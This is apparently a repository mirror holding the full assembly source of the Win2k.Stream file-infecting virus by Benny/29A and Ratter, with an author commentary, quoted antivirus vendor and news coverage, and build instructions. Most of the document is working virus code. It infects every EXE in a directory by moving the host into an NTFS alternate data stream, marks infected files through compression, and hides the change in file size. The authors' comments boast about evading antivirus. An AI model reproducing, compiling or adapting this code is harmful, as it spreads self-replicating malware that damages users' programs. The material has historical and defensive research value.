mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2025-01-18 16:25:28 +00:00
635 lines
21 KiB
NASM
635 lines
21 KiB
NASM
|
||
COMMENT#
|
||
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
|
||
³ Win2k.Stream ³
|
||
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
|
||
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
|
||
³ by Benny/29A and Ratter ³
|
||
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
|
||
|
||
|
||
Let us introduce very small and simple infector presenting how to use features
|
||
of NTFS in viruses. This virus loox like standard Petite-compressed PE file.
|
||
However, it presents the newest way of PE file infecting method.
|
||
|
||
How the virus worx? It uses streamz, the newest feature of NTFS filesystem
|
||
and file compression, already implemented in old NTFS fs.
|
||
|
||
|
||
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
|
||
³ Basic principles of NTFS streamz ³
|
||
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
|
||
|
||
How the file loox? Ya know that the file contains exactly the same what you can
|
||
see when you will open it (e.g. in WinCommander). NTFS, implemented by
|
||
Windows 2000, has new feature - the file can be divided to streamz. The content
|
||
what you can see when you will open the file is called Primary stream - usually
|
||
files haven't more than one stream. However, you can create NEW stream ( = new
|
||
content) in already existing file without overwritting the content.
|
||
|
||
Example:
|
||
|
||
addressing of primary stream -> <filename> e.g. "calc.exe"
|
||
addressing of other streamz -> <filename>:<stream name> e.g. "calc.exe:stream"
|
||
|
||
If you have NTFS, you can test it. Copy to NTFS for instance "calc.exe", and
|
||
then create new file "calc.exe:stream" and write there "blahblah". Open
|
||
"calc.exe". Whats there? Calculator ofcoz. Now open "calc.exe:stream". Whats
|
||
there? "blahblah", the new file in the old one :)
|
||
|
||
Can you imagine how useful r streamz for virus coding?
|
||
|
||
The virus infects file by moving the old content to the new stream and replacing
|
||
the primary stream with virus code.
|
||
|
||
File (calc.exe) before infection:
|
||
|
||
ÉÍCalc.exeÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
|
||
ºÚÄPrimary stream (visible part)Ä¿º
|
||
º³ Calculator ³º
|
||
ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº
|
||
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
|
||
|
||
File (calc.exe) after infection:
|
||
|
||
ÉÍCalc.exeÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
|
||
ºÚÄPrimary stream (calc.exe)Ä¿ÚÄNext stream (calc.exe:STR)Ä¿ º
|
||
º³ Virus ³³ Calculator ³ º
|
||
ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ º
|
||
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
|
||
|
||
Simple and efficent, ain't it?
|
||
|
||
|
||
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
|
||
³ Details of virus ³
|
||
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
|
||
|
||
* The virus infects all EXE files in actual directory.
|
||
|
||
* The virus uses as already-infected mark file compression. All infected
|
||
files are compressed by NTFS and virus then does not infect already
|
||
compressed files. Well, almost all files after infection r smaller than
|
||
before, so user won't recognize virus by checking free disk space :)
|
||
|
||
* If user will copy the infected file to non-NTFS partition (in this case
|
||
only primary stream is copied), the host program will be destroyed and
|
||
instead of running host program virus will show message box. That can
|
||
be also called as payload :P
|
||
|
||
* The virus is very small, exactly 3628 bytes, becoz it's compressed by
|
||
Petite 2.1 PE compression utility (http://www.icl.ndirect.co.uk/petite/).
|
||
|
||
* The disinfection is very easy - just copy the content of <file>:STR to
|
||
<file> and delete <file>:STR. If you want to create sample of infected
|
||
file, then just copy the virus to some file and copy any program (host
|
||
program) to <file>:STR. Thats all! However, AVerz have to rebuild their
|
||
search engine to remove this virus, becoz until now, they had no fucking
|
||
idea what are streamz :)
|
||
|
||
* This virus was coded in Czech Republic by Benny/29A and Ratter, on our
|
||
common VX meeting at Ratter's city... we just coded it to show that
|
||
Windows 2000 is just another OS designed for viruses... it really is :)
|
||
|
||
* We would like to thank GriYo for pointing us to NTFS new features.
|
||
The fame is also yourz, friend!
|
||
|
||
|
||
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
|
||
³ In the media ³
|
||
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
|
||
|
||
|
||
AVP's description:
|
||
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||
|
||
This is the first known Windows virus using the "stream companion" infection
|
||
method. That method is based on an NTFS feature that allows to create multiple
|
||
data streams associated with a file.
|
||
|
||
*NTFS Streams*
|
||
---------------
|
||
|
||
Each file contains at least one default data stream that is accessed just by
|
||
the file name. Each file may also contain additional stream(s) that can be
|
||
accessed by their personal names (filename:streamname).
|
||
|
||
The default file stream is the file body itself (in pre-NTFS terms). For
|
||
instance, when an EXE file is executed the program is read from the default
|
||
file stream; when a document is opened, its content is also read from the
|
||
default stream.
|
||
|
||
Additional file streams may contain any data. The streams cannot be accessed or
|
||
modified without reference to the file. When the file is deleted, its streams
|
||
are deleted as well; if the file is renamed, the streams follow its new name.
|
||
|
||
In the Windows package there is no standard tool to view/edit file streams. To
|
||
"manually" view file streams you need to use special utilities, for instance
|
||
the FAR utility with the file steams support plug-in (Ctrl-PgDn displays file
|
||
streams for selected file).
|
||
|
||
*Virus Details*
|
||
----------------
|
||
|
||
The virus itself is a Windows application (PE EXE file) compressed using the
|
||
Petite PE EXE file compressor and is about 4K in size. When run it infects all
|
||
EXE files in the current directory and then returns control to the host file.
|
||
If any error occurs, the virus displays the message:
|
||
|
||
Win2k.Stream by Benny/29A & Ratter
|
||
This cell has been infected by [Win2k.Stream] virus!
|
||
|
||
While infecting a file the virus creates a new stream associated with the victim
|
||
file. That stream has the name "STR", i.e. the complete stream name is
|
||
"FileName:STR". The virus then moves the victim file body to the STR stream
|
||
(default stream, see above) and then overwrites the victim file body (default
|
||
stream) with its (virus) code.
|
||
|
||
As a result, when an infected file is executed Windows reads the default stream
|
||
(which is overwritten by virus code) and executes it. Also, Windows reports the
|
||
same file size for all infected files - that is the virus length.
|
||
|
||
To release control to the host program the virus just creates a new process by
|
||
accessing the original file program using the name "FileName:STR".
|
||
|
||
That infection method should work on any NTFS system, but the virus checks the
|
||
system version and runs only under Win2000.
|
||
|
||
|
||
AVP's press release:
|
||
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||
|
||
*A New Generation of Windows 2000 Viruses is Streaming Towards PC Users*
|
||
------------------------------------------------------------------------
|
||
|
||
Moscow, Russia, September 4, 2000 – Kaspersky Lab announces the discovery of
|
||
W2K.Stream virus, which represents a new generation of malicious programs for
|
||
Windows 2000. This virus uses a new breakthrough technology based on the
|
||
"Stream Companion" method for self-embedding into the NTFS file system.
|
||
|
||
The virus originates from the Czech Republic and was created at the end of
|
||
August by the hackers going by the pseudonyms of Benny and Ratter. To date,
|
||
Kaspersky Lab has not registered any infections resulting from this virus;
|
||
however, its working capacity and ability for existence "in-the-wild" are
|
||
unchallenged.
|
||
|
||
"Certainly, this virus begins a new era in computer virus creation," said
|
||
Eugene Kaspersky, Head of Anti-Virus Research at Kaspersky Lab. "The ’Stream
|
||
Companion’ technology the virus uses to plant itself into files makes its
|
||
detection and disinfection extremely difficult to complete.”
|
||
|
||
Unlike previously known methods of file infection (adding the virus body at
|
||
beginning, ending or any other part of a host file), the "Stream" virus
|
||
exploits the NTFS file system (Windows NT/2000) feature, which allows multiple
|
||
data streams. For instance, in Windows 95/98 (FAT) files, there is only one
|
||
data stream – the program code itself. Windows NT/2000 (NTFS) enables users
|
||
to create any number of data streams within the file: independent executable
|
||
program modules, as well as various service streams (file access rights,
|
||
encryption data, processing time etc.). This makes NTFS files very flexible,
|
||
allowing for the creation of user-defined data streams aimed at completing
|
||
specific tasks.
|
||
|
||
"Stream" is the first known virus that uses the feature of creating multiple
|
||
data streams for infecting files of the NTFS file system (see picture 1). To
|
||
complete this, the virus creates an additional data stream named "STR" and
|
||
moves the original content of the host program there. Then, it replaces the
|
||
main data stream with the virus code. As a result, when the infected program
|
||
is run, the virus takes control, completes the replicating procedure and then
|
||
passes control to the host program.
|
||
|
||
*"Stream" file infection procedure*
|
||
------------------------------------
|
||
|
||
File before infection File after infection
|
||
|
||
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
|
||
³°°°°°°°°°°°°°°°°°°°³ ³°°°°°°°°°°°°°°°°°°°³
|
||
³°°°°°°°°°°°°°°°°°°°³ ³°°° main stream°°°°³
|
||
³°°°°°°°°°°°°°°°°°°°³ ³°°° virus body°°°°°³
|
||
³°°°°main stream°°°°³ ³°°°°°°°°°°°°°°°°°°°³
|
||
³°°°°°°°°°°°°°°°°°°°³ ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´
|
||
³°°°°program body°°°³ ³°°°°°°°°°°°°°°°°°°°³
|
||
³°°°°°°°°°°°°°°°°°°°³ ³°additional stream°³
|
||
³°°°°°°°°°°°°°°°°°°°³ ³°°°program body°°°°³
|
||
³°°°°°°°°°°°°°°°°°°°³ ³°°°°°°°°°°°°°°°°°°°³
|
||
ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´ ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´
|
||
³±±±±±±±±±±±±±±±±±±±³ ³±±±±±±±±±±±±±±±±±±±³
|
||
³±±service streams±±³ ³±±service streams±±³
|
||
³±±±±±±±±±±±±±±±±±±±³ ³±±±±±±±±±±±±±±±±±±±³
|
||
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
|
||
|
||
"By default, anti-virus programs check only the main data stream. There will be
|
||
no problems protecting users from this particular virus," Eugene Kaspersky
|
||
continues. "However, the viruses can move to additional data streams. In this
|
||
case, many anti-virus products will become obsolete, and their vendors will be
|
||
forced to urgently redesign their anti-virus engines."
|
||
|
||
|
||
In MSNBC's news:
|
||
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||
|
||
*New trick can hide computer viruses*
|
||
*But experts question danger posed by ‘Stream’ technology*
|
||
-----------------------------------------------------------
|
||
|
||
Sept. 6 — A new kind of computer virus has been released, but security experts
|
||
are in disagreement over just how menacing it is. The virus demonstrates a
|
||
technique that future writers can use to hide their malicious software from
|
||
most current antivirus scanners. But some antivirus companies are playing down
|
||
the threat.
|
||
|
||
THE VIRUS, CALLED W2K.STREAM, poses little threat — it was written as a
|
||
relatively benign “proof of concept.” But, according to a source who requested
|
||
anonymity, it was posted on several virus writer Web sites over Labor Day
|
||
weekend — making copycats possible.
|
||
|
||
The virus takes advantage of a little-used feature included in Windows 2000 and
|
||
older Windows NT systems that allows programs to be split into pieces called
|
||
streams. Generally, the body of a program resides in the main stream. But other
|
||
streams can be created to store information related to what’s in the main
|
||
stream. Joel Scambray, author of “Hacking Exposed,” described these additional
|
||
streams as “Post-it notes” attached to the main file.
|
||
|
||
The problem is that antivirus programs only examine the main stream. W2K.Stream
|
||
demonstrates a programmer’s ability to create an additional stream and hide
|
||
malicious code there.
|
||
|
||
“Certainly, this virus begins a new era in computer virus creation,” said
|
||
Eugene Kaspersky, Head of Anti-Virus Research at Kaspersky Lab, in a press
|
||
release. “The ‘Stream Companion’ technology the virus uses to plant itself into
|
||
files makes its detection and disinfection extremely difficult to complete.”
|
||
|
||
*THIS BUG ISN’T DANGEROUS*
|
||
---------------------------
|
||
|
||
No W2K.stream infections have been reported, and experts don’t believe the
|
||
virus is “in the wild” — circulating on the Internet — yet. At any rate, this
|
||
virus actually makes things easy for antivirus companies. If a user is
|
||
infected, the program creates an alternate stream and places the legitimate
|
||
file in this alternate location; the virus replaces it as the main stream. That
|
||
makes detection by current antivirus products easy. But future viruses could
|
||
do just the opposite, evading current antivirus products.
|
||
|
||
One antivirus researcher who requested anonymity called release of the bug
|
||
“somewhat akin to the first macro virus.” He added that reengineering antivirus
|
||
software to scan for multiple streams would be a complicated effort.
|
||
“In this case, many anti-virus products will become obsolete, and their vendors
|
||
will be forced to urgently redesign their anti-virus engines,” Kaspersky said.
|
||
|
||
*AN OLD ISSUE*
|
||
---------------
|
||
|
||
There is nothing new about the potential of exploiting the multiple stream
|
||
issue; Scambray hints at the problem in the book “Hacking Exposed,” and
|
||
described it even more explicitly in a 1998 Infoworld.com article.
|
||
|
||
The SANS Institute, a group of security researchers, issued an “alert”
|
||
criticizing antivirus companies for not updating their products to scan the
|
||
contents of any file stream earlier.
|
||
|
||
“We found that the scanners were incapable of identifying viruses stored within
|
||
an alternate data stream,” the report said. “For example if you create the file
|
||
MyResume.doc:ILOVEYOU.vbs and store the contents of the I Love You virus within
|
||
the alternate data stream file, none of the tested virus scanners were capable
|
||
of finding the virus during a complete disk scan.”
|
||
|
||
But some antivirus companies described the threat as minimal because the
|
||
alternate stream trick only hides the bug while it’s stored on a victim’s
|
||
computer. Pirkka Palomaki, Director of Product Marketing for F-Secure Corp.,
|
||
said for the virus to actually run, it has to come out of hiding and load into
|
||
main memory.
|
||
|
||
“It would be detected as it tried to activate,” Palomaki said. “But this
|
||
signifies importance of real-time protection.” He added the virus would still
|
||
have to find its way onto a victim’s computer; and that victim would have to
|
||
be tricked into installing the virus using one of the traditional methods,
|
||
such as clicking on an infected e-mail attachment.
|
||
|
||
“It could increase the ability to for scanners to miss something,” said Pat
|
||
Nolan, virus researcher at McAfee Corp. “But we’re on top of it. If there is
|
||
a vulnerability, it will be short-lived.”
|
||
|
||
|
||
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
|
||
³ How to compile it? ³
|
||
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
|
||
|
||
Use Petite version 2.1 (http://www.icl.ndirect.co.uk/petite/).
|
||
|
||
tasm32 /ml /m9 /q stream
|
||
tlink32 -Tpe -c -x -aa stream,,,import32
|
||
pewrsec stream.exe
|
||
petite -9 -e2 -v1 -p1 -y -b0 -r* stream.exe
|
||
|
||
|
||
|
||
And here comes the virus source...
|
||
#
|
||
|
||
|
||
.586p
|
||
.model flat,stdcall
|
||
|
||
|
||
include win32api.inc ;include filez
|
||
include useful.inc
|
||
|
||
extrn ExitProcess:PROC ;used APIz
|
||
extrn VirtualFree:PROC
|
||
extrn FindFirstFileA:PROC
|
||
extrn FindNextFileA:PROC
|
||
extrn FindClose:PROC
|
||
extrn WinExec:PROC
|
||
extrn GetCommandLineA:PROC
|
||
extrn GetModuleFileNameA:PROC
|
||
extrn DeleteFileA:PROC
|
||
extrn ReadFile:PROC
|
||
extrn CopyFileA:PROC
|
||
extrn WriteFile:PROC
|
||
extrn CreateFileA:PROC
|
||
extrn CloseHandle:PROC
|
||
extrn MessageBoxA:PROC
|
||
extrn GetFileSize:PROC
|
||
extrn VirtualAlloc:PROC
|
||
extrn DeviceIoControl:PROC
|
||
extrn GetFileAttributesA:PROC
|
||
extrn GetTempFileNameA:PROC
|
||
extrn CreateProcessA:PROC
|
||
extrn GetVersion:PROC
|
||
|
||
|
||
FSCTL_SET_COMPRESSION equ 9 shl 16 or 3 shl 14 or 16 shl 2
|
||
|
||
;compression flag
|
||
STARTUPINFO STRUCT ;used by CreateProcessA API
|
||
cb DWORD ?
|
||
lpReserved DWORD ?
|
||
lpDesktop DWORD ?
|
||
lpTitle DWORD ?
|
||
dwX DWORD ?
|
||
dwY DWORD ?
|
||
dwXSize DWORD ?
|
||
dwYSize DWORD ?
|
||
dwXCountChars DWORD ?
|
||
dwYCountChars DWORD ?
|
||
dwFillAttribute DWORD ?
|
||
dwFlags DWORD ?
|
||
wShowWindow WORD ?
|
||
cbReserved2 WORD ?
|
||
lpReserved2 DWORD ?
|
||
hStdInput DWORD ?
|
||
hStdOutput DWORD ?
|
||
hStdError DWORD ?
|
||
STARTUPINFO ENDS
|
||
PROCESS_INFORMATION STRUCT
|
||
hProcess DWORD ?
|
||
hThread DWORD ?
|
||
dwProcessId DWORD ?
|
||
dwThreadId DWORD ?
|
||
PROCESS_INFORMATION ENDS
|
||
|
||
|
||
@pushvar macro variable, empty ;macro for pushing variablez
|
||
local next_instr
|
||
ifnb <empty>
|
||
%out too much arguments in macro '@pushvar'
|
||
.err
|
||
endif
|
||
call next_instr
|
||
variable
|
||
next_instr:
|
||
endm
|
||
|
||
|
||
.data
|
||
|
||
extExe db '*.exe',0 ;search mask
|
||
|
||
fHandle dd ? ;file search handle
|
||
file_name db MAX_PATH dup(?) ;actual program name
|
||
db MAX_PATH dup(?)
|
||
file_name2 db MAX_PATH dup(?) ;temprorary file
|
||
db 4 dup (?)
|
||
WFD WIN32_FIND_DATA ? ;win32 find data
|
||
proc_info PROCESS_INFORMATION <> ;used by CreateProcessA
|
||
startup_info STARTUPINFO <> ;...
|
||
.code
|
||
Start: ;start of virus
|
||
call GetVersion ;get OS version
|
||
cmp al,5 ;5 = Win2000
|
||
jnz msgBox ;quit if not Win2000
|
||
|
||
mov edi,offset file_name
|
||
push MAX_PATH
|
||
push edi
|
||
push 0
|
||
call GetModuleFileNameA ;get path+filename of actual
|
||
;program
|
||
push offset WFD
|
||
push offset extExe
|
||
call FindFirstFileA ;find first file to infect
|
||
test eax,eax
|
||
jz end_host
|
||
mov [fHandle],eax ;save handle
|
||
|
||
|
||
search_loop:
|
||
call infect ;try to infect file
|
||
|
||
push offset WFD
|
||
push dword ptr [fHandle]
|
||
call FindNextFileA ;try to find next file
|
||
test eax,eax
|
||
jne search_loop ;and infect it
|
||
|
||
push dword ptr [fHandle]
|
||
call FindClose ;close file search handle
|
||
|
||
end_host:
|
||
mov esi,offset file_name ;get our filename
|
||
push esi
|
||
@endsz
|
||
dec esi
|
||
mov edi,esi
|
||
mov eax,"RTS:" ;append there :"STR" stream
|
||
stosd ;name
|
||
pop esi
|
||
|
||
call GetCommandLineA ;get command line
|
||
xchg eax,edi ;to EDI
|
||
|
||
;esi - app name
|
||
;edi - cmd line
|
||
xor eax,eax
|
||
push offset proc_info
|
||
push offset startup_info
|
||
push eax
|
||
push eax
|
||
push eax
|
||
push eax
|
||
push eax
|
||
push eax
|
||
push edi
|
||
push esi
|
||
call CreateProcessA ;jump to host code
|
||
xchg eax,ecx
|
||
jecxz msgBox ;if error, show message box
|
||
|
||
end_app:
|
||
push 0
|
||
call ExitProcess ;exit
|
||
|
||
msgBox: push 1000h ;show some lame msg box :)
|
||
@pushsz "Win2k.Stream by Benny/29A & Ratter" ;copyleft :]
|
||
@pushsz "This cell has been infected by [Win2k.Stream] virus!"
|
||
push 0 ;with name of virus and authorz
|
||
call MessageBoxA
|
||
jmp end_app
|
||
|
||
|
||
|
||
infect: push offset [WFD.WFD_szFileName]
|
||
call GetFileAttributesA ;check if the file is NTFS
|
||
test eax,800h ;compressed = already infected
|
||
jz next_infect
|
||
ret ;quit then
|
||
|
||
next_infect:
|
||
push offset [WFD.WFD_szFileName]
|
||
mov byte ptr [flagz],OPEN_EXISTING
|
||
call Create_File ;open found program
|
||
jz infect_end
|
||
|
||
xor eax,eax
|
||
push eax
|
||
@pushvar <dd ?>
|
||
push eax
|
||
push eax
|
||
push 4
|
||
@pushvar <dd 1> ;default compression
|
||
push FSCTL_SET_COMPRESSION
|
||
push ebx ;NTFS compress it =
|
||
call DeviceIoControl ;mark as already infected
|
||
; = and save disk space :)
|
||
push ebx
|
||
call CloseHandle ;close file handle
|
||
|
||
mov esi,offset file_name2
|
||
push esi
|
||
push 0
|
||
@pushsz "str"
|
||
@pushsz "."
|
||
call GetTempFileNameA ;create name for temp file
|
||
test eax,eax
|
||
jz infect_end
|
||
|
||
mov edi,offset [WFD.WFD_szFileName]
|
||
push 0
|
||
push esi
|
||
push edi
|
||
call CopyFileA ;copy there victim program
|
||
test eax,eax
|
||
jz infect_end
|
||
|
||
|
||
push 0
|
||
push edi
|
||
push offset file_name
|
||
call CopyFileA ;copy ourself to victim program
|
||
|
||
push esi
|
||
|
||
mov esi,edi
|
||
@endsz
|
||
xchg esi,edi
|
||
dec edi
|
||
mov eax,"RTS:" ;append :"STR" stream to
|
||
stosd ;victim program filename
|
||
xor al,al
|
||
stosb
|
||
|
||
call Create_File ;open victim file
|
||
jz infect_end
|
||
|
||
push 0
|
||
push ebx
|
||
call GetFileSize ;get its size
|
||
xchg eax,edi
|
||
|
||
push PAGE_READWRITE
|
||
push MEM_COMMIT or MEM_RESERVE
|
||
push edi
|
||
push 0
|
||
call VirtualAlloc ;allocate enough memory
|
||
test eax,eax ;for file content
|
||
jz infect_end_handle
|
||
|
||
xchg eax,esi
|
||
|
||
xor eax,eax
|
||
push eax
|
||
@pushvar <file_size dd ?>
|
||
push edi
|
||
push esi
|
||
push ebx
|
||
call ReadFile ;read file content to
|
||
test eax,eax ;allocated memory
|
||
jz infect_end_handle
|
||
|
||
push ebx
|
||
call CloseHandle ;close its file handle
|
||
|
||
push offset file_name2
|
||
call DeleteFileA ;delete temporary file
|
||
|
||
mov byte ptr [flagz],CREATE_ALWAYS
|
||
push offset [WFD.WFD_szFileName]
|
||
call Create_File ;open stream
|
||
jz infect_end_dealloc
|
||
|
||
push 0
|
||
mov ecx,offset file_size
|
||
push ecx
|
||
push dword ptr [ecx]
|
||
push esi
|
||
push ebx
|
||
call WriteFile ;write there victim program
|
||
test eax,eax
|
||
jz infect_end_handle
|
||
|
||
infect_end_handle:
|
||
push ebx
|
||
call CloseHandle ;close its file handle
|
||
infect_end_dealloc:
|
||
push MEM_DECOMMIT
|
||
push dword ptr [file_size]
|
||
push esi
|
||
call VirtualFree ;free allocated memory
|
||
push MEM_RELEASE
|
||
push 0
|
||
push esi
|
||
call VirtualFree ;release reserved part of mem
|
||
infect_end:
|
||
ret
|
||
|
||
; [esp+4] - file_name
|
||
Create_File: ;proc for opening file
|
||
xor eax,eax
|
||
push eax
|
||
push eax
|
||
db 6ah
|
||
flagz db OPEN_EXISTING ;variable file open flag
|
||
push eax
|
||
push eax
|
||
push GENERIC_READ or GENERIC_WRITE
|
||
push dword ptr [esp+1ch]
|
||
call CreateFileA ;open file
|
||
xchg eax,ebx ;handle to EBX
|
||
inc ebx ;is EBX -1?
|
||
lahf ;store flags
|
||
dec ebx ;correct EBX
|
||
sahf ;restore flags
|
||
retn 4 ;quit from proc
|
||
|
||
end Start ;end of virus
|